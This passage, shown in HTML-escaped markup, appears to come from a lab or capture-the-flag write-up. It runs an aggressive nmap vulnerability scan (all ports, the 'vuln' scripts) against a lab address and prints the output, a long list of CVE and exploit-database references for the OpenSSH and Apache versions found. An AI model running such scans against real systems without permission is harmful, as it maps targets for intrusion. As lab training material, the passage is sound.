&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;sudo&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; nmap&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -v&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -oA&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; tools-r-us&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -Pn&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -A&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -T4&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -sS&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -script&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; vuln&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;          -p-&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; 10.10.28.154&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;This gives the following output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# Nmap 7.92 scan initiated Sun Jan 30 15:52:33 2022 as: nmap -v -oA tools-r-us -Pn -A -T4 -sS -script vuln -p- 10.10.28.154
Pre-scan script results:
|_broadcast-avahi-dos: ERROR: Script execution failed (use -d to debug)
Nmap scan report for 10.10.28.154
Host is up (0.17s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| vulners:
|   cpe:/a:openbsd:openssh:7.2p2:
|     	PACKETSTORM:140070	7.8	https://vulners.com/packetstorm/PACKETSTORM:140070	*EXPLOIT*
|     	EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09	7.8	https://vulners.com/exploitpack/EXPLOITPACK:5BCA798C6BA71FAE29334297EC0B6A09	*EXPLOIT*
|     	EDB-ID:40888	7.8	https://vulners.com/exploitdb/EDB-ID:40888	*EXPLOIT*
|     	CVE-2016-8858	7.8	https://vulners.com/cve/CVE-2016-8858
|     	CVE-2016-6515	7.8	https://vulners.com/cve/CVE-2016-6515
|     	1337DAY-ID-26494	7.8	https://vulners.com/zdt/1337DAY-ID-26494	*EXPLOIT*
|     	SSV:92579	7.5	https://vulners.com/seebug/SSV:92579	*EXPLOIT*
|     	CVE-2016-10009	7.5	https://vulners.com/cve/CVE-2016-10009
|     	1337DAY-ID-26576	7.5	https://vulners.com/zdt/1337DAY-ID-26576	*EXPLOIT*
|     	SSV:92582	7.2	https://vulners.com/seebug/SSV:92582	*EXPLOIT*
|     	CVE-2016-10012	7.2	https://vulners.com/cve/CVE-2016-10012
|     	CVE-2015-8325	7.2	https://vulners.com/cve/CVE-2015-8325
|     	SSV:92580	6.9	https://vulners.com/seebug/SSV:92580	*EXPLOIT*
|     	CVE-2016-10010	6.9	https://vulners.com/cve/CVE-2016-10010
|     	1337DAY-ID-26577	6.9	https://vulners.com/zdt/1337DAY-ID-26577	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/SUSE-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/SUSE-CVE-2019-25017/	5.8	https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2019-25017/	*EXPLOIT*
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/REDHAT-OPENSHIFT-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/IBM-AIX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/IBM-AIX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/GENTOO-LINUX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/DEBIAN-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/AMAZON-LINUX-AMI-2-CVE-2019-6111/	*EXPLOIT*
|     	MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/	5.8	https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2019-6111/	*EXPLOIT*
|     	EXPLOITPACK:98FE96309F9524B8C84C508837551A19	5.8	https://vulners.com/exploitpack/EXPLOITPACK:98FE96309F9524B8C84C508837551A19	*EXPLOIT*
|     	EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	5.8	https://vulners.com/exploitpack/EXPLOITPACK:5330EA02EBDE345BFC9D6DDDD97F9E97	*EXPLOIT*
|     	EDB-ID:46516	5.8	https://vulners.com/exploitdb/EDB-ID:46516	*EXPLOIT*
|     	EDB-ID:46193	5.8	https://vulners.com/exploitdb/EDB-ID:46193	*EXPLOIT*
|     	CVE-2019-6111	5.8	https://vulners.com/cve/CVE-2019-6111
|     	1337DAY-ID-32328	5.8	https://vulners.com/zdt/1337DAY-ID-32328	*EXPLOIT*
|     	1337DAY-ID-32009	5.8	https://vulners.com/zdt/1337DAY-ID-32009	*EXPLOIT*
|     	SSV:91041	5.5	https://vulners.com/seebug/SSV:91041	*EXPLOIT*
|     	PACKETSTORM:140019	5.5	https://vulners.com/packetstorm/PACKETSTORM:140019	*EXPLOIT*
|     	PACKETSTORM:136234	5.5	https://vulners.com/packetstorm/PACKETSTORM:136234	*EXPLOIT*
|     	EXPLOITPACK:F92411A645D85F05BDBD274FD222226F	5.5	https://vulners.com/exploitpack/EXPLOITPACK:F92411A645D85F05BDBD274FD222226F	*EXPLOIT*
|     	EXPLOITPACK:9F2E746846C3C623A27A441281EAD138	5.5	https://vulners.com/exploitpack/EXPLOITPACK:9F2E746846C3C623A27A441281EAD138	*EXPLOIT*
|     	EXPLOITPACK:1902C998CBF9154396911926B4C3B330	5.5	https://vulners.com/exploitpack/EXPLOITPACK:1902C998CBF9154396911926B4C3B330	*EXPLOIT*
|     	EDB-ID:40858	5.5	https://vulners.com/exploitdb/EDB-ID:40858	*EXPLOIT*
|     	EDB-ID:40119	5.5	https://vulners.com/exploitdb/EDB-ID:40119	*EXPLOIT*
|     	EDB-ID:39569	5.5	https://vulners.com/exploitdb/EDB-ID:39569	*EXPLOIT*
|     	CVE-2016-3115	5.5	https://vulners.com/cve/CVE-2016-3115
|     	SSH_ENUM	5.0	https://vulners.com/canvas/SSH_ENUM	*EXPLOIT*
|     	PACKETSTORM:150621	5.0	https://vulners.com/packetstorm/PACKETSTORM:150621	*EXPLOIT*
|     	MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS	5.0	https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/SSH/SSH_ENUMUSERS	*EXPLOIT*
|     	EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0	5.0	https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0	*EXPLOIT*
|     	EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283	5.0	https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283	*EXPLOIT*
|     	EDB-ID:45939	5.0	https://vulners.com/exploitdb/EDB-ID:45939	*EXPLOIT*
|     	EDB-ID:45233	5.0	https://vulners.com/exploitdb/EDB-ID:45233	*EXPLOIT*
|     	CVE-2018-15919	5.0	https://vulners.com/cve/CVE-2018-15919
|     	CVE-2018-15473	5.0	https://vulners.com/cve/CVE-2018-15473
|     	CVE-2017-15906	5.0	https://vulners.com/cve/CVE-2017-15906
|     	CVE-2016-10708	5.0	https://vulners.com/cve/CVE-2016-10708
|     	1337DAY-ID-31730	5.0	https://vulners.com/zdt/1337DAY-ID-31730	*EXPLOIT*
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/OPENBSD-OPENSSH-CVE-2020-14145/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP9-CVE-2020-14145/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP8-CVE-2020-14145/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP5-CVE-2020-14145/	*EXPLOIT*
|     	MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/	4.3	https://vulners.com/metasploit/MSF:ILITIES/F5-BIG-IP-CVE-2020-14145/	*EXPLOIT*
|     	EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF	4.3	https://vulners.com/exploitpack/EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF	*EXPLOIT*
|     	EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF	4.3	https://vulners.com/exploitpack/EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF	*EXPLOIT*
|     	EDB-ID:40136	4.3	https://vulners.com/exploitdb/EDB-ID:40136	*EXPLOIT*
|     	EDB-ID:40113	4.3	https://vulners.com/exploitdb/EDB-ID:40113	*EXPLOIT*
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-6210	4.3	https://vulners.com/cve/CVE-2016-6210
|     	1337DAY-ID-25440	4.3	https://vulners.com/zdt/1337DAY-ID-25440	*EXPLOIT*
|     	1337DAY-ID-25438	4.3	https://vulners.com/zdt/1337DAY-ID-25438	*EXPLOIT*
|     	CVE-2019-6110	4.0	https://vulners.com/cve/CVE-2019-6110
|     	CVE-2019-6109	4.0	https://vulners.com/cve/CVE-2019-6109
|     	CVE-2018-20685	2.6	https://vulners.com/cve/CVE-2018-20685
|     	SSV:92581	2.1	https://vulners.com/seebug/SSV:92581	*EXPLOIT*
|     	CVE-2016-10011	2.1	https://vulners.com/cve/CVE-2016-10011
|     	SRC-2016-0002	0.0	https://vulners.com/srcincite/SRC-2016-0002	*EXPLOIT*
|     	PACKETSTORM:151227	0.0	https://vulners.com/packetstorm/PACKETSTORM:151227	*EXPLOIT*
|     	PACKETSTORM:140261	0.0	https://vulners.com/packetstorm/PACKETSTORM:140261	*EXPLOIT*
|     	PACKETSTORM:138006	0.0	https://vulners.com/packetstorm/PACKETSTORM:138006	*EXPLOIT*
|     	PACKETSTORM:137942	0.0	https://vulners.com/packetstorm/PACKETSTORM:137942	*EXPLOIT*
|_    	1337DAY-ID-30937	0.0	https://vulners.com/zdt/1337DAY-ID-30937	*EXPLOIT*
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-enum:
|_  /protected/: Potentially interesting folder (401 Unauthorized)
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.
|_http-csrf: Couldn&#039;t find any CSRF vulnerabilities.
| vulners:
|   cpe:/a:apache:http_server:2.4.18:
|     	CVE-2021-44790	7.5	https://vulners.com/cve/CVE-2021-44790
|     	CVE-2021-39275	7.5	https://vulners.com/cve/CVE-2021-39275
|     	CVE-2021-26691	7.5	https://vulners.com/cve/CVE-2021-26691
|     	CVE-2017-7679	7.5	https://vulners.com/cve/CVE-2017-7679
|     	CVE-2017-7668	7.5	https://vulners.com/cve/CVE-2017-7668
|     	CVE-2017-3169	7.5	https://vulners.com/cve/CVE-2017-3169
|     	CVE-2017-3167	7.5	https://vulners.com/cve/CVE-2017-3167
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/	7.2	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0211/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/	7.2	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0211/	*EXPLOIT*
|     	EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB	7.2	https://vulners.com/exploitpack/EXPLOITPACK:44C5118F831D55FAF4259C41D8BDA0AB	*EXPLOIT*
|     	EDB-ID:46676	7.2	https://vulners.com/exploitdb/EDB-ID:46676	*EXPLOIT*
|     	CVE-2019-0211	7.2	https://vulners.com/cve/CVE-2019-0211
|     	1337DAY-ID-32502	7.2	https://vulners.com/zdt/1337DAY-ID-32502	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/SUSE-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/SUSE-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE_LINUX-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/ORACLE_LINUX-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP1-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/FREEBSD-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/FREEBSD-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/DEBIAN-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/APACHE-HTTPD-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/AMAZON_LINUX-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/AMAZON_LINUX-CVE-2017-15715/	*EXPLOIT*
|     	MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/	6.8	https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2018-1312/	*EXPLOIT*
|     	MSF:ILITIES/ALPINE-LINUX-CVE-2017-15715/	6.8	https://vulners.com/metasploit/MSF:ILITIES/ALPINE-LINUX-CVE-2017-15715/	*EXPLOIT*
|     	FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	6.8	https://vulners.com/githubexploit/FDF3DFA1-ED74-5EE2-BF5C-BA752CA34AE8	*EXPLOIT*
|     	CVE-2021-40438	6.8	https://vulners.com/cve/CVE-2021-40438
|     	CVE-2020-35452	6.8	https://vulners.com/cve/CVE-2020-35452
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2017-15715	6.8	https://vulners.com/cve/CVE-2017-15715
|     	4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	6.8	https://vulners.com/githubexploit/4810E2D9-AC5F-5B08-BFB3-DDAFA2F63332	*EXPLOIT*
|     	CVE-2021-44224	6.4	https://vulners.com/cve/CVE-2021-44224
|     	CVE-2019-10082	6.4	https://vulners.com/cve/CVE-2019-10082
|     	CVE-2017-9788	6.4	https://vulners.com/cve/CVE-2017-9788
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/	6.0	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2019-0217/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/	6.0	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2019-0217/	*EXPLOIT*
|     	CVE-2019-0217	6.0	https://vulners.com/cve/CVE-2019-0217
|     	CVE-2020-1927	5.8	https://vulners.com/cve/CVE-2020-1927
|     	CVE-2019-10098	5.8	https://vulners.com/cve/CVE-2019-10098
|     	1337DAY-ID-33577	5.8	https://vulners.com/zdt/1337DAY-ID-33577	*EXPLOIT*
|     	CVE-2016-5387	5.1	https://vulners.com/cve/CVE-2016-5387
|     	SSV:96537	5.0	https://vulners.com/seebug/SSV:96537	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2018-1333/	5.0	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1333/	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2018-1303/	5.0	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1303/	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/	5.0	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2020-1934/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-8743/	5.0	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2016-8743/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP3-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2017-15710/	*EXPLOIT*
|     	MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/	5.0	https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2017-15710/	*EXPLOIT*
|     	MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED	5.0	https://vulners.com/metasploit/MSF:AUXILIARY/SCANNER/HTTP/APACHE_OPTIONSBLEED	*EXPLOIT*
|     	EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D	5.0	https://vulners.com/exploitpack/EXPLOITPACK:C8C256BE0BFF5FE1C0405CB0AA9C075D	*EXPLOIT*
|     	EXPLOITPACK:2666FB0676B4B582D689921651A30355	5.0	https://vulners.com/exploitpack/EXPLOITPACK:2666FB0676B4B582D689921651A30355	*EXPLOIT*
|     	EDB-ID:42745	5.0	https://vulners.com/exploitdb/EDB-ID:42745	*EXPLOIT*
|     	EDB-ID:40909	5.0	https://vulners.com/exploitdb/EDB-ID:40909	*EXPLOIT*
|     	CVE-2021-34798	5.0	https://vulners.com/cve/CVE-2021-34798
|     	CVE-2021-33193	5.0	https://vulners.com/cve/CVE-2021-33193
|     	CVE-2021-26690	5.0	https://vulners.com/cve/CVE-2021-26690
|     	CVE-2020-1934	5.0	https://vulners.com/cve/CVE-2020-1934
|     	CVE-2019-17567	5.0	https://vulners.com/cve/CVE-2019-17567
|     	CVE-2019-0220	5.0	https://vulners.com/cve/CVE-2019-0220
|     	CVE-2019-0196	5.0	https://vulners.com/cve/CVE-2019-0196
|     	CVE-2018-17199	5.0	https://vulners.com/cve/CVE-2018-17199
|     	CVE-2018-17189	5.0	https://vulners.com/cve/CVE-2018-17189
|     	CVE-2018-1333	5.0	https://vulners.com/cve/CVE-2018-1333
|     	CVE-2018-1303	5.0	https://vulners.com/cve/CVE-2018-1303
|     	CVE-2017-9798	5.0	https://vulners.com/cve/CVE-2017-9798
|     	CVE-2017-15710	5.0	https://vulners.com/cve/CVE-2017-15710
|     	CVE-2016-8743	5.0	https://vulners.com/cve/CVE-2016-8743
|     	CVE-2016-8740	5.0	https://vulners.com/cve/CVE-2016-8740
|     	CVE-2016-4979	5.0	https://vulners.com/cve/CVE-2016-4979
|     	1337DAY-ID-28573	5.0	https://vulners.com/zdt/1337DAY-ID-28573	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-0197/	4.9	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2019-0197/	*EXPLOIT*
|     	CVE-2019-0197	4.9	https://vulners.com/cve/CVE-2019-0197
|     	MSF:ILITIES/UBUNTU-CVE-2018-1302/	4.3	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1302/	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2018-1301/	4.3	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1301/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975/	4.3	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2016-4975/	*EXPLOIT*
|     	MSF:ILITIES/DEBIAN-CVE-2019-10092/	4.3	https://vulners.com/metasploit/MSF:ILITIES/DEBIAN-CVE-2019-10092/	*EXPLOIT*
|     	MSF:ILITIES/APACHE-HTTPD-CVE-2020-11985/	4.3	https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2020-11985/	*EXPLOIT*
|     	MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/	4.3	https://vulners.com/metasploit/MSF:ILITIES/APACHE-HTTPD-CVE-2019-10092/	*EXPLOIT*
|     	CVE-2020-11985	4.3	https://vulners.com/cve/CVE-2020-11985
|     	CVE-2019-10092	4.3	https://vulners.com/cve/CVE-2019-10092
|     	CVE-2018-1302	4.3	https://vulners.com/cve/CVE-2018-1302
|     	CVE-2018-1301	4.3	https://vulners.com/cve/CVE-2018-1301
|     	CVE-2018-11763	4.3	https://vulners.com/cve/CVE-2018-11763
|     	CVE-2016-4975	4.3	https://vulners.com/cve/CVE-2016-4975
|     	CVE-2016-1546	4.3	https://vulners.com/cve/CVE-2016-1546
|     	4013EC74-B3C1-5D95-938A-54197A58586D	4.3	https://vulners.com/githubexploit/4013EC74-B3C1-5D95-938A-54197A58586D	*EXPLOIT*
|     	1337DAY-ID-33575	4.3	https://vulners.com/zdt/1337DAY-ID-33575	*EXPLOIT*
|     	MSF:ILITIES/UBUNTU-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/UBUNTU-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/REDHAT_LINUX-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/ORACLE-SOLARIS-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/IBM-HTTP_SERVER-CVE-2018-1283/	*EXPLOIT*
|     	MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/HUAWEI-EULEROS-2_0_SP2-CVE-2018-1283/	*EXPLOIT*
